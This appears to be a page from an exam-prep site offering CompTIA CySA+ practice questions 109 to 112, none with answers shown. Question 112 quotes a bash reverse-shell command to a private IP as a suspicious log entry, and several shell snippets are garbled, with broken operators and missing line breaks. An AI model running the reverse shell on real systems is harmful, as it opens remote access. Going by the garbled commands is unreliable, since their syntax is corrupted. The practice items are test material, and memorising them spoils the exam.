Spring Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: save70

Download Full Version CS0-003 CompTIA Exam

Page: 28 / 36
Total 482 questions

CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Question 109

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device ' s operating system. Which of the following best meets this

requirement?

Options:

A.

SIEM

B.

CASB

C.

SOAR

D.

EDR

Question 110

During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees

takeown/f .*

SUCCESS:

Which of the following best describes the potentially malicious activity observed?

Options:

A.

Registry changes or anomalies

B.

Data exfiltration

C.

Unauthorized privileges

D.

File configuration changes

Question 111

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?

Options:

A.

Reschedule the upgrade and deploy the patch

B.

Request an exception to exclude the patch from installation

C.

Update the risk register and request a change to the SLA

D.

Notify the incident response team and rerun the vulnerability scan

Question 112

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i > & /dev/tcp/10.1.2.3/8080 0 > & 1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.

#!/bin/bashnc 10.1.2.3 8080 -vv > dev/null & & echo " Malicious activity " Il echo " OK "

B.

#!/bin/bashps -fea | grep 8080 > dev/null & & echo " Malicious activity " I| echo " OK "

C.

#!/bin/bashls /opt/tcp/10.1.2.3/8080 > dev/null & & echo " Malicious activity " I| echo " OK "

D.

#!/bin/bashnetstat -antp Igrep 8080 > dev/null & & echo " Malicious activity " I| echo " OK "

Page: 28 / 36
Total 482 questions